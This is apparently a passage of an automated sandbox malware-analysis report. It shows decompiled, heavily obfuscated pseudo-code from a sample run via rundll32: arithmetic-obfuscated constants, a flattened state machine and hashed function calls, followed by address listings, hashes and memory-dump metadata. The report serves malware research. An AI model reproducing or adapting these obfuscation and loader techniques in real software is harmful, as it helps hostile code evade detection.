				_v336 = _v336 ^ 0x0a2923c5;
				_v328 = 0x78e0eb;
				_v328 = _v328 + 0x488f;
				_v328 = _v328 ^ 0x00799c70;
				_v344 = 0x81e0f6;
				_v344 = _v344 << 5;
				_v344 = _v344 ^ 0x103feee2;
				_v468 = 0xdaa1d;
				_v468 = _v468 * 0x7d;
				_v468 = _v468 + 0xfffff9ad;
				_v468 = _v468 >> 0xb;
				_v468 = _v468 ^ 0x0000a0f1;
				_v500 = 0x314529;
				_t62 =  &_v500; // 0x314529
				_v500 =  *_t62 * 0x2f;
				_t64 =  &_v500; // 0x314529
				_v500 =  *_t64 * 0x58;
				_v500 = _v500 ^ 0x606cc451;
				_v500 = _v500 ^ 0x7c6b32c1;
				_v452 = 0xb84a45;
				_v452 = _v452 + 0x7128;
				_t705 = 0x77;
				_v452 = _v452 / _t704;
				_v452 = _v452 ^ 0x000855d5;
				_v320 = 0x670f1a;
				_v320 = _v320 + 0xc1b0;
				_v320 = _v320 ^ 0x00622c3e;
				_v528 = 0x36f841;
				_v528 = _v528 | 0xd9d6132d;
				_v528 = _v528 + 0xffff776d;
				_v528 = _v528 << 0xd;
				_v528 = _v528 ^ 0xce5fe5c5;
				_v444 = 0x9c7682;
				_v444 = _v444 ^ 0x90589f65;
				_v444 = _v444 * 0x27;
				_v444 = _v444 ^ 0x0df55b42;
				_v512 = 0x104d73;
				_v512 = _v512 / _t705;
				_v512 = _v512 ^ 0x3e9257a1;
				_v512 = _v512 | 0xb9bbbc7d;
				_v512 = _v512 ^ 0xbfb4ec53;
				_v428 = 0xbc5642;
				_v428 = _v428 ^ 0xe7847a8c;
				_t706 = 0x55;
				_v428 = _v428 * 0x7f;
				_v428 = _v428 ^ 0xb4dd412b;
				_v436 = 0x8f794f;
				_v436 = _v436 << 9;
				_v436 = _v436 / _t706;
				_v436 = _v436 ^ 0x00567a69;
				_v496 = 0x46853b;
				_v496 = _v496 + 0xffff90ed;
				_v496 = _v496 >> 5;
				_t707 = 0x67;
				_v496 = _v496 / _t707;
				_v496 = _v496 ^ 0x000cc5d9;
				_v372 = 0xd1254b;
				_v372 = _v372 << 7;
				_v372 = _v372 ^ 0x689f86f2;
				_v504 = 0x5d1a6;
				_v504 = _v504 + 0xffffc3f1;
				_v504 = _v504 ^ 0x7853fb4b;
				_v504 = _v504 | 0x0811a454;
				_v504 = _v504 ^ 0x78557827;
				_v376 = 0x40c0d3;
				_v376 = _v376 + 0xba7b;
				_v376 = _v376 ^ 0x0043f819;
				_v448 = 0x188995;
				_v448 = _v448 ^ 0x19c6d723;
				_v448 = _v448 + 0xffff6508;
				_v448 = _v448 ^ 0x19d0df3a;
				_v368 = 0xa08e58;
				_v368 = _v368 | 0xc4b17aa1;
				_v368 = _v368 ^ 0xc4b81ac3;
				_v492 = 0x5a5e24;
				_v492 = _v492 ^ 0x14ae01a0;
				_v492 = _v492 + 0xffffeac5;
				_v492 = _v492 + 0xffff378f;
				_v492 = _v492 ^ 0x14f310c0;
				_v460 = 0x25665c;
				_v460 = _v460 << 9;
				_v460 = _v460 + 0xb06;
				_v460 = _v460 + 0x6999;
				_v460 = _v460 ^ 0x4ac4129f;
				_v316 = 0x9c2147;
				_v316 = _v316 | 0xf1f8cc6e;
				_v316 = _v316 ^ 0xf1f4b434;
				_v524 = 0x2e48d0;
				_v524 = _v524 + 0xffff862d;
				_v524 = _v524 + 0x29e8;
				_v524 = _v524 * 0x4b;
				_v524 = _v524 ^ 0x0d7cea3a;
				_v384 = 0x8701af;
				_v384 = _v384 + 0xf5cc;
				_v384 = _v384 >> 7;
				_v384 = _v384 ^ 0x000bfa6c;
				_v484 = 0x89e0a0;
				_v484 = _v484 >> 6;
				_v484 = _v484 << 0xd;
				_v484 = _v484 | 0xc3b3473c;
				_v484 = _v484 ^ 0xc7fe9c77;
				_v516 = 0xee0a8f;
				_v516 = _v516 ^ 0x55897709;
				_v516 = _v516 | 0x2d6779b6;
				_v516 = _v516 >> 0xc;
				_v516 = _v516 ^ 0x0009a0b5;
				_v408 = 0x69ddc;
				_v408 = _v408 + 0xffff558a;
				_v408 = _v408 | 0x7b9a8e55;
				_v408 = _v408 ^ 0x7b9d6bde;
				_v440 = 0x3ec00a;
				_t708 = 7;
				_v440 = _v440 * 0x6d;
				_v440 = _v440 ^ 0x82501226;
				_v440 = _v440 ^ 0x98e12210;
				_v360 = 0xa9836;
				_t709 = 0x66;
				_v360 = _v360 / _t708;
				_v360 = _v360 ^ 0x000ed550;
				_v508 = 0xae1f70;
				_v508 = _v508 / _t709;
				_v508 = _v508 | 0xf9ffdfbb;
				_v508 = _v508 ^ 0xf9f8fc25;
				_v324 = 0xeedbe0;
				_v324 = _v324 + 0xffffa9bd;
				_v324 = _v324 ^ 0x00e20b5f;
				_v392 = 0x6a2c5c;
				_v392 = _v392 | 0xb7dff57a;
				_v392 = _v392 << 0xb;
				_v392 = _v392 ^ 0xffee34eb;
				_v432 = 0x407729;
				_v432 = _v432 + 0xb79f;
				_v432 = _v432 | 0x8bf66f7a;
				_v432 = _v432 ^ 0x8bfc9481;
				_v424 = 0x63ea97;
				_v424 = _v424 >> 0x10;
				_v424 = _v424 + 0xffffc4e0;
				_v424 = _v424 ^ 0xfffae0f6;
				_v332 = 0x7c55b7;
				_t710 = 0x1b;
				_v332 = _v332 / _t710;
				_v332 = _v332 ^ 0x0008067b;
				_v352 = 0x1d2ffa;
				_t711 = 0x70;
				_v352 = _v352 * 0x3b;
				_v352 = _v352 ^ 0x06b3fb37;
				_v416 = 0x356707;
				_t712 = 0x4d;
				_v416 = _v416 / _t711;
				_v416 = _v416 * 0xf;
				_v416 = _v416 ^ 0x000a8be6;
				_v400 = 0x975723;
				_v400 = _v400 | 0x269443d2;
				_v400 = _v400 << 9;
				_v400 = _v400 ^ 0x2eac99c7;
				_v396 = 0x86389d;
				_v396 = _v396 ^ 0xdd3767b8;
				_t713 = 0x6d;
				_v396 = _v396 / _t712;
				_v396 = _v396 ^ 0x02eba2ca;
				_v404 = 0xdbbdba;
				_v404 = _v404 << 9;
				_v404 = _v404 / _t713;
				_v404 = _v404 ^ 0x01a57735;
				_v356 = 0xfabb05;
				_v356 = _v356 | 0x8af6c05e;
				_v356 = _v356 ^ 0x8af1d93b;
				_v380 = 0x2efe0b;
				_v380 = _v380 | 0x60ccafe9;
				_v380 = _v380 >> 2;
				_v380 = _v380 ^ 0x183e3099;
				_v348 = 0x4aabda;
				_v348 = _v348 ^ 0x6d9ddbef;
				_v348 = _v348 ^ 0x6dd36298;
				_v388 = 0x49b388;
				_v388 = _v388 | 0xfd8f470c;
				_v388 = _v388 << 0xa;
				_v388 = _v388 ^ 0x3fdfba02;
				_v472 = 0xbd7846;
				_v472 = _v472 + 0xffff85c8;
				_v472 = _v472 >> 0xd;
				_v472 = _v472 >> 0xc;
				_v472 = _v472 ^ 0x00060807;
				_v456 = 0xd92e51;
				_t714 = 0x17;
				_v456 = _v456 / _t714;
				_v456 = _v456 >> 0xd;
				_v456 = _v456 + 0xffff8d85;
				_v456 = _v456 ^ 0xfffee4a4;
				_v340 = 0x27bb27;
				_v340 = _v340 | 0xb25f39d4;
				_v340 = _v340 ^ 0xb27a85e4;
				_v464 = 0x5d8dc9;
				_v464 = _v464 + 0x522d;
				_v464 = _v464 << 1;
				_t623 = 0xb;
				_v464 = _v464 / _t623;
				_v464 = _v464 ^ 0x0017bd02;
				_v364 = 0xb86d20;
				_v364 = _v364 + 0x9843;
				_v364 = _v364 ^ 0x00bb00fc;
				_v480 = 0x632eda;
				_v480 = _v480 + 0xffff6eee;
				_v480 = _v480 + 0xffff8324;
				_v480 = _v480 + 0x3513;
				_v480 = _v480 ^ 0x006160eb;
				_v412 = 0xc84084;
				_t715 = 0x19;
				_t729 = _v312;
				_t624 = _v312;
				_v412 = _v412 / _t715;
				_v412 = _v412 | 0x26b33a0b;
				_v412 = _v412 ^ 0x26bcb4da;
				_v420 = 0x8ac001;
				_v420 = _v420 << 0xf;
				_v420 = _v420 ^ 0xe10d88e3;
				_v420 = _v420 ^ 0x810a258e;
				while(1) {
					L1:
					while(1) {
						_t686 = 0x14e2fae;
						do {
							while(1) {
								L3:
								_t736 = _t723 - 0x6872271;
								if(_t736 <= 0) {
									break;
								}
								__eflags = _t723 - 0x6af60a9;
								if(_t723 == 0x6af60a9) {
									_push(0x4000);
									_push(0x4000);
									_t574 = E002C3512(0x4000);
									_v536 = _t574;
									__eflags = _t574;
									if(__eflags == 0) {
										_t633 = _v488;
										_t723 = 0x3b379fe;
										_t686 = 0x14e2fae;
										goto L31;
									}
									_t723 = 0x2b997a9;
									L13:
									_t633 = _v488;
									_t686 = 0x14e2fae;
									continue;
								}
								__eflags = _t723 - 0x6fc00ac;
								if(_t723 == 0x6fc00ac) {
									_t724 =  &_v256;
									_t687 = E002BEF71(8, 0x10);
									_t578 = _v520;
									__eflags = _t578 - _t687;
									if(_t578 < _t687) {
										_t689 = _t687 - _t578;
										_t719 = _t724;
										_t654 = _t689 >> 1;
										__eflags = _t654;
										_t621 = memset(_t719, 0x2d002d, _t654 << 2);
										asm("adc ecx, ecx");
										_t724 = _t724 + _t689 * 2;
										memset(_t719 + _t654, _t621, 0);
										_t730 =  &(_t730[6]);
									}
									_push(E002BEF71(8, 0x10));
									_push(_v436);
									_push(_t724);
									_t636 = 0xb;
									E002B5A07(_t636, _v428);
									_t730 =  &(_t730[5]);
									_t723 = 0x6af60a9;
									L12:
									_t583 = _v536;
									goto L13;
								}
								__eflags = _t723 - 0xa6d69a8;
								if(_t723 == 0xa6d69a8) {
									_t722 = E002BEF71(1, 8);
									_push(_t722);
									_push(_v328);
									_push( &_v288);
									_t637 = 9;
									E002B5A07(_t637, _v336);
									_t730 =  &(_t730[5]);
									_t723 = 0xb1820f0;
									goto L12;
								}
								__eflags = _t723 - 0xb1820f0;
								if(_t723 == 0xb1820f0) {
									_t722 = E002BEF71(4, 0x10);
									_push(_t722);
									_push(_v452);
									_push( &_v128);
									_t638 = 0xb;
									E002B5A07(_t638, _v500);
									_t730 =  &(_t730[5]);
									_t723 = 0x6fc00ac;
									goto L12;
								}
								__eflags = _t723 - 0xff9e75d;
								if(__eflags != 0) {
									goto L31;
								}
								_t723 = 0xa6d69a8;
							}
							if(_t736 == 0) {
								E002CFD29( *_t633, _v416, _t624, _v400,  *((intOrPtr*)(_t633 + 4)));
								_t488 =  &_v488; // 0x6160eb
								_t633 =  *_t488;
								_t730 =  &(_t730[3]);
								_t723 = 0x605d68b;
								_t624 = _t624 +  *((intOrPtr*)(_t633 + 4));
								goto L1;
							}
							if(_t723 == _t686) {
								_push(0x2b141c);
								_push(_v360);
								_v308 = _t722 + _t729;
								_t624 = E002BF545( &_v128, __eflags, _v508, _t722 + _t729 - _t729,  &_v256, _v324,  &_v288, _v392, E002BBB4B(_v408, _v440, __eflags), _v432) + _t729;
								E002BAE03(_v424, _v332, _v352, _t595);
								_t730 =  &(_t730[0xc]);
								_t723 = 0x6872271;
								goto L12;
							}
							if(_t723 == 0x2109cc3) {
								_t722 = _t722 +  *((intOrPtr*)(_t633 + 4));
								_push(_t633);
								_push(_t633);
								_t729 = E002C3512(_t722);
								_t583 = _v536;
								__eflags = _t729;
								_t633 = _v488;
								_t686 = 0x14e2fae;
								_t723 =  !=  ? 0x14e2fae : 0x6704547;
								goto L3;
							}
							if(_t723 == 0x2b997a9) {
								_push(_v492);
								_push(_v368);
								_push(0x2b13bc);
								_t604 = E002BAB66(_v376, _v448, __eflags);
								_push( &_v256);
								_push(_t604);
								_push(_t722);
								_push(_v536);
								 *((intOrPtr*)(E002BC1DC(_v376, 0xbf7d08b0, 0xef)))();
								E002BAE03(_v460, _v316, _v524, _t604);
								_t730 =  &(_t730[9]);
								_t723 = 0x2109cc3;
								goto L12;
							}
							if(_t723 == 0x605d68b) {
								_push(0x2b138c);
								_push(_v356);
								_t614 = E002BF060(E002BBB4B(_v396, _v404, __eflags), __eflags, _v348, _t624, _v308 - _t624, _v388,  &_v256, _v472);
								E002BAE03(_v456, _v340, _v464, _t610);
								_t616 = _v312;
								_t628 = _t624 + _t614 - _t729;
								__eflags = _t628;
								 *_t616 = _t729;
								 *(_t616 + 4) = _t628;
								L34:
								return _v536;
							}
							if(_t723 != 0x6704547) {
								goto L31;
							}
							E002B68DE(_v364, _v480, _v412, _v420, _t583);
							return 0;
							L31:
							__eflags = _t723 - 0x3b379fe;
						} while (__eflags != 0);
						goto L34;
					}
				}
			}










































































































                                                                                                                      0x002c6864
                                                                                                                      0x002c686e
                                                                                                                      0x002c6875
                                                                                                                      0x002c6879
                                                                                                                      0x002c6881
                                                                                                                      0x002c688c
                                                                                                                      0x002c6897
                                                                                                                      0x002c68a2
                                                                                                                      0x002c68af
                                                                                                                      0x002c68b3
                                                                                                                      0x002c68b8
                                                                                                                      0x002c68c8
                                                                                                                      0x002c68cd
                                                                                                                      0x002c68d3
                                                                                                                      0x002c68db
                                                                                                                      0x002c68e3
                                                                                                                      0x002c68e8
                                                                                                                      0x002c68f0
                                                                                                                      0x002c68f8
                                                                                                                      0x002c6900
                                                                                                                      0x002c6908
                                                                                                                      0x002c6910
                                                                                                                      0x002c6918
                                                                                                                      0x002c6920
                                                                                                                      0x002c6933
                                                                                                                      0x002c6936
                                                                                                                      0x002c693d
                                                                                                                      0x002c6948
                                                                                                                      0x002c6953
                                                                                                                      0x002c695e
                                                                                                                      0x002c6969
                                                                                                                      0x002c6974
                                                                                                                      0x002c697c
                                                                                                                      0x002c6987
                                                                                                                      0x002c6994
                                                                                                                      0x002c6998
                                                                                                                      0x002c69a0
                                                                                                                      0x002c69a5
                                                                                                                      0x002c69ad
                                                                                                                      0x002c69b5
                                                                                                                      0x002c69ba
                                                                                                                      0x002c69be
                                                                                                                      0x002c69c3
                                                                                                                      0x002c69c7
                                                                                                                      0x002c69cf
                                                                                                                      0x002c69d7
                                                                                                                      0x002c69df
                                                                                                                      0x002c69ed
                                                                                                                      0x002c69ee
                                                                                                                      0x002c69f2
                                                                                                                      0x002c69fa
                                                                                                                      0x002c6a05
                                                                                                                      0x002c6a10
                                                                                                                      0x002c6a1b
                                                                                                                      0x002c6a23
                                                                                                                      0x002c6a2b
                                                                                                                      0x002c6a33
                                                                                                                      0x002c6a38
                                                                                                                      0x002c6a40
                                                                                                                      0x002c6a48
                                                                                                                      0x002c6a55
                                                                                                                      0x002c6a59
                                                                                                                      0x002c6a63
                                                                                                                      0x002c6a73
                                                                                                                      0x002c6a79
                                                                                                                      0x002c6a81
                                                                                                                      0x002c6a89
                                                                                                                      0x002c6a91
                                                                                                                      0x002c6a9c
                                                                                                                      0x002c6aaf
                                                                                                                      0x002c6ab2
                                                                                                                      0x002c6ab9
                                                                                                                      0x002c6ac4
                                                                                                                      0x002c6acc
                                                                                                                      0x002c6ad9
                                                                                                                      0x002c6add
                                                                                                                      0x002c6ae5
                                                                                                                      0x002c6aed
                                                                                                                      0x002c6af5
                                                                                                                      0x002c6afe
                                                                                                                      0x002c6b01
                                                                                                                      0x002c6b05
                                                                                                                      0x002c6b0d
                                                                                                                      0x002c6b18
                                                                                                                      0x002c6b20
                                                                                                                      0x002c6b2b
                                                                                                                      0x002c6b33
                                                                                                                      0x002c6b3b
                                                                                                                      0x002c6b43
                                                                                                                      0x002c6b4b
                                                                                                                      0x002c6b53
                                                                                                                      0x002c6b5e
                                                                                                                      0x002c6b69
                                                                                                                      0x002c6b74
                                                                                                                      0x002c6b7c
                                                                                                                      0x002c6b84
                                                                                                                      0x002c6b8c
                                                                                                                      0x002c6b94
                                                                                                                      0x002c6b9f
                                                                                                                      0x002c6baa
                                                                                                                      0x002c6bb5
                                                                                                                      0x002c6bbd
                                                                                                                      0x002c6bc5
                                                                                                                      0x002c6bcd
                                                                                                                      0x002c6bd5
                                                                                                                      0x002c6bdd
                                                                                                                      0x002c6be5
                                                                                                                      0x002c6bea
                                                                                                                      0x002c6bf2
                                                                                                                      0x002c6bfa
                                                                                                                      0x002c6c02
                                                                                                                      0x002c6c0d
                                                                                                                      0x002c6c18
                                                                                                                      0x002c6c23
                                                                                                                      0x002c6c2b
                                                                                                                      0x002c6c33
                                                                                                                      0x002c6c40
                                                                                                                      0x002c6c44
                                                                                                                      0x002c6c4c
                                                                                                                      0x002c6c57
                                                                                                                      0x002c6c62
                                                                                                                      0x002c6c6a
                                                                                                                      0x002c6c75
                                                                                                                      0x002c6c7d
                                                                                                                      0x002c6c82
                                                                                                                      0x002c6c87
                                                                                                                      0x002c6c8f
                                                                                                                      0x002c6c97
                                                                                                                      0x002c6c9f
                                                                                                                      0x002c6ca7
                                                                                                                      0x002c6caf
                                                                                                                      0x002c6cb4
                                                                                                                      0x002c6cbc
                                                                                                                      0x002c6cc7
                                                                                                                      0x002c6cd4
                                                                                                                      0x002c6cdf
                                                                                                                      0x002c6cea
                                                                                                                      0x002c6cf9
                                                                                                                      0x002c6cfc
                                                                                                                      0x002c6d00
                                                                                                                      0x002c6d08
                                                                                                                      0x002c6d10
                                                                                                                      0x002c6d24
                                                                                                                      0x002c6d25
                                                                                                                      0x002c6d2e
                                                                                                                      0x002c6d39
                                                                                                                      0x002c6d49
                                                                                                                      0x002c6d4f
                                                                                                                      0x002c6d57
                                                                                                                      0x002c6d5f
                                                                                                                      0x002c6d6a
                                                                                                                      0x002c6d75
                                                                                                                      0x002c6d80
                                                                                                                      0x002c6d8b
                                                                                                                      0x002c6d96
                                                                                                                      0x002c6d9e
                                                                                                                      0x002c6da9
                                                                                                                      0x002c6db1
                                                                                                                      0x002c6db9
                                                                                                                      0x002c6dc1
                                                                                                                      0x002c6dc9
                                                                                                                      0x002c6dd4
                                                                                                                      0x002c6ddc
                                                                                                                      0x002c6de7
                                                                                                                      0x002c6df2
                                                                                                                      0x002c6e04
                                                                                                                      0x002c6e09
                                                                                                                      0x002c6e12
                                                                                                                      0x002c6e1d
                                                                                                                      0x002c6e30
                                                                                                                      0x002c6e33
                                                                                                                      0x002c6e3a
                                                                                                                      0x002c6e45
                                                                                                                      0x002c6e59
                                                                                                                      0x002c6e5a
                                                                                                                      0x002c6e6d
                                                                                                                      0x002c6e74
                                                                                                                      0x002c6e7f
                                                                                                                      0x002c6e8a
                                                                                                                      0x002c6e95
                                                                                                                      0x002c6e9d
                                                                                                                      0x002c6ea8
                                                                                                                      0x002c6eb3
                                                                                                                      0x002c6ec7
                                                                                                                      0x002c6ec8
                                                                                                                      0x002c6ecf
                                                                                                                      0x002c6eda
                                                                                                                      0x002c6ee5
                                                                                                                      0x002c6efa
                                                                                                                      0x002c6f03
                                                                                                                      0x002c6f0e
                                                                                                                      0x002c6f19
                                                                                                                      0x002c6f24
                                                                                                                      0x002c6f2f
                                                                                                                      0x002c6f3a
                                                                                                                      0x002c6f45
                                                                                                                      0x002c6f4d
                                                                                                                      0x002c6f58
                                                                                                                      0x002c6f63
                                                                                                                      0x002c6f6e
                                                                                                                      0x002c6f79
                                                                                                                      0x002c6f84
                                                                                                                      0x002c6f8f
                                                                                                                      0x002c6f97
                                                                                                                      0x002c6fa2
                                                                                                                      0x002c6faa
                                                                                                                      0x002c6fb2
                                                                                                                      0x002c6fb7
                                                                                                                      0x002c6fbc
                                                                                                                      0x002c6fc4
                                                                                                                      0x002c6fd0
                                                                                                                      0x002c6fd5
                                                                                                                      0x002c6fdb
                                                                                                                      0x002c6fe0
                                                                                                                      0x002c6fe8
                                                                                                                      0x002c6ff0
                                                                                                                      0x002c6ffb
                                                                                                                      0x002c7006
                                                                                                                      0x002c7011
                                                                                                                      0x002c7019
                                                                                                                      0x002c7021
                                                                                                                      0x002c7029
                                                                                                                      0x002c702e
                                                                                                                      0x002c7034
                                                                                                                      0x002c703c
                                                                                                                      0x002c7047
                                                                                                                      0x002c7052
                                                                                                                      0x002c705d
                                                                                                                      0x002c7065
                                                                                                                      0x002c706d
                                                                                                                      0x002c7075
                                                                                                                      0x002c707d
                                                                                                                      0x002c7085
                                                                                                                      0x002c7097
                                                                                                                      0x002c70a1
                                                                                                                      0x002c70a8
                                                                                                                      0x002c70af
                                                                                                                      0x002c70b6
                                                                                                                      0x002c70c1
                                                                                                                      0x002c70cc
                                                                                                                      0x002c70d7
                                                                                                                      0x002c70df
                                                                                                                      0x002c70ea
                                                                                                                      0x002c70f5
                                                                                                                      0x002c70f5
                                                                                                                      0x002c70f9
                                                                                                                      0x002c70f9
                                                                                                                      0x002c70fe
                                                                                                                      0x002c70fe
                                                                                                                      0x002c70fe
                                                                                                                      0x002c70fe
                                                                                                                      0x002c7104
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002c72d3
                                                                                                                      0x002c72d9
                                                                                                                      0x002c7418
                                                                                                                      0x002c7419
                                                                                                                      0x002c741a
                                                                                                                      0x002c741f
                                                                                                                      0x002c7425
                                                                                                                      0x002c7427
                                                                                                                      0x002c7433
                                                                                                                      0x002c7437
                                                                                                                      0x002c743c
                                                                                                                      0x00000000
                                                                                                                      0x002c743c
                                                                                                                      0x002c7429
                                                                                                                      0x002c71d4
                                                                                                                      0x002c71d4
                                                                                                                      0x002c70f9
                                                                                                                      0x00000000
                                                                                                                      0x002c70f9
                                                                                                                      0x002c72df
                                                                                                                      0x002c72e5
                                                                                                                      0x002c7390
                                                                                                                      0x002c73a7
                                                                                                                      0x002c73a9
                                                                                                                      0x002c73af
                                                                                                                      0x002c73b1
                                                                                                                      0x002c73b3
                                                                                                                      0x002c73b5
                                                                                                                      0x002c73be
                                                                                                                      0x002c73be
                                                                                                                      0x002c73c0
                                                                                                                      0x002c73c2
                                                                                                                      0x002c73c4
                                                                                                                      0x002c73c7
                                                                                                                      0x002c73c7
                                                                                                                      0x002c73c7
                                                                                                                      0x002c73dd
                                                                                                                      0x002c73de
                                                                                                                      0x002c73ec
                                                                                                                      0x002c73ef
                                                                                                                      0x002c73f0
                                                                                                                      0x002c73f5
                                                                                                                      0x002c73f8
                                                                                                                      0x002c71d0
                                                                                                                      0x002c71d0
                                                                                                                      0x00000000
                                                                                                                      0x002c71d0
                                                                                                                      0x002c72eb
                                                                                                                      0x002c72f1
                                                                                                                      0x002c735e
                                                                                                                      0x002c7367
                                                                                                                      0x002c7368
                                                                                                                      0x002c7376
                                                                                                                      0x002c7379
                                                                                                                      0x002c737a
                                                                                                                      0x002c737f
                                                                                                                      0x002c7382
                                                                                                                      0x00000000
                                                                                                                      0x002c7382
                                                                                                                      0x002c72f3
                                                                                                                      0x002c72f9
                                                                                                                      0x002c7325
                                                                                                                      0x002c732e
                                                                                                                      0x002c732f
                                                                                                                      0x002c7337
                                                                                                                      0x002c733a
                                                                                                                      0x002c733b
                                                                                                                      0x002c7340
                                                                                                                      0x002c7343
                                                                                                                      0x00000000
                                                                                                                      0x002c7343
                                                                                                                      0x002c72fb
                                                                                                                      0x002c7301
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002c7307
                                                                                                                      0x002c7307
                                                                                                                      0x002c710a
                                                                                                                      0x002c72ba
                                                                                                                      0x002c72bf
                                                                                                                      0x002c72bf
                                                                                                                      0x002c72c3
                                                                                                                      0x002c72c6
                                                                                                                      0x002c72cb
                                                                                                                      0x00000000
                                                                                                                      0x002c72cb
                                                                                                                      0x002c7112
                                                                                                                      0x002c7218
                                                                                                                      0x002c721d
                                                                                                                      0x002c7232
                                                                                                                      0x002c7291
                                                                                                                      0x002c7294
                                                                                                                      0x002c7299
                                                                                                                      0x002c729c
                                                                                                                      0x00000000
                                                                                                                      0x002c729c
                                                                                                                      0x002c711e
                                                                                                                      0x002c71e1
                                                                                                                      0x002c71ef
                                                                                                                      0x002c71f0
                                                                                                                      0x002c71f8
                                                                                                                      0x002c71ff
                                                                                                                      0x002c7203
                                                                                                                      0x002c7207
                                                                                                                      0x002c720b
                                                                                                                      0x002c7210
                                                                                                                      0x00000000
                                                                                                                      0x002c7210
                                                                                                                      0x002c712a
                                                                                                                      0x002c716d
                                                                                                                      0x002c7171
                                                                                                                      0x002c7183
                                                                                                                      0x002c7188
                                                                                                                      0x002c719e
                                                                                                                      0x002c71a3
                                                                                                                      0x002c71a4
                                                                                                                      0x002c71a5
                                                                                                                      0x002c71b1
                                                                                                                      0x002c71c3
                                                                                                                      0x002c71c8
                                                                                                                      0x002c71cb
                                                                                                                      0x00000000
                                                                                                                      0x002c71cb
                                                                                                                      0x002c7132
                                                                                                                      0x002c744f
                                                                                                                      0x002c7454
                                                                                                                      0x002c749e
                                                                                                                      0x002c74b8
                                                                                                                      0x002c74bd
                                                                                                                      0x002c74c7
                                                                                                                      0x002c74c7
                                                                                                                      0x002c74c9
                                                                                                                      0x002c74cb
                                                                                                                      0x002c74ce
                                                                                                                      0x00000000
                                                                                                                      0x002c74ce
                                                                                                                      0x002c713e
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002c715e
                                                                                                                      0x00000000
                                                                                                                      0x002c7441
                                                                                                                      0x002c7441
                                                                                                                      0x002c7441
                                                                                                                      0x00000000
                                                                                                                      0x002c744d
                                                                                                                      0x002c70f9

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $^Z$'xUx$(q$)E1$)w@$-R$:|$>,b$\,j$\f%$izV$`a$x
                                                                                                                      • API String ID: 0-215870970
                                                                                                                      • Opcode ID: dcfec40ea3b488f8d46bda75af3d579dd230ac055006aa8d9c6b4e54d0bdc6b7
                                                                                                                      • Instruction ID: c673eae873ca70fde24243191267066649c5fca64c97938ae790f5cd772ef2d3
                                                                                                                      • Opcode Fuzzy Hash: dcfec40ea3b488f8d46bda75af3d579dd230ac055006aa8d9c6b4e54d0bdc6b7
                                                                                                                      • Instruction Fuzzy Hash: E05221725083819FD374CF25C98AB8BBBE1BBC4358F108A1DE5DA96260D7B18859CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002B2FA1 Relevance: 16.8, Strings: 13, Instructions: 522COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E002B2FA1(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				signed int _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				intOrPtr _v1588;
				char _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				signed int _v1796;
				signed int _v1800;
				signed int _v1804;
				signed int _v1808;
				signed int _v1812;
				signed int _v1816;
				signed int _v1820;
				signed int _v1824;
				signed int _v1828;
				signed int _v1832;
				void* _t602;
				void* _t605;
				void* _t612;
				void* _t615;
				void* _t627;
				void* _t629;
				signed int _t631;
				signed int _t632;
				signed int _t633;
				signed int _t634;
				signed int _t635;
				signed int _t636;
				signed int _t637;
				signed int _t638;
				signed int _t639;
				signed int _t640;
				signed int _t641;
				signed int _t642;
				signed int _t643;
				signed int _t644;
				signed int _t645;
				signed int _t646;
				void* _t647;
				signed int _t650;
				signed int _t696;
				signed int _t706;
				void* _t708;
				void* _t713;
				void* _t714;

				_v1568 = _v1568 & 0x00000000;
				_v1596 = _v1596 & 0x00000000;
				_v1576 = 0x5e97ec;
				_v1572 = 0x72e58f;
				_v1768 = 0x70cb3c;
				_v1768 = _v1768 + 0xffffc098;
				_v1768 = _v1768 >> 0xd;
				_v1768 = _v1768 ^ 0x02000384;
				_v1820 = 0xee4d2b;
				_t15 =  &_v1820; // 0xee4d2b
				_t629 = __ecx;
				_t708 = 0x23fa72;
				_t631 = 0x3b;
				_v1820 =  *_t15 / _t631;
				_t632 = 0x76;
				_v1820 = _v1820 * 0x22;
				_v1820 = _v1820 + 0xffff6a70;
				_v1820 = _v1820 ^ 0x0087d8ad;
				_v1744 = 0x47ad5e;
				_v1744 = _v1744 + 0xffff8cd4;
				_v1744 = _v1744 * 0x70;
				_v1744 = _v1744 ^ 0x1f2feb3a;
				_v1628 = 0xf34c5;
				_v1628 = _v1628 + 0x5841;
				_v1628 = _v1628 ^ 0x0009a1de;
				_v1812 = 0x9823b5;
				_v1812 = _v1812 ^ 0xd7f45b6c;
				_v1812 = _v1812 / _t632;
				_v1812 = _v1812 ^ 0x01df5c7b;
				_v1812 = _v1812 ^ 0x000f259a;
				_v1608 = 0x734624;
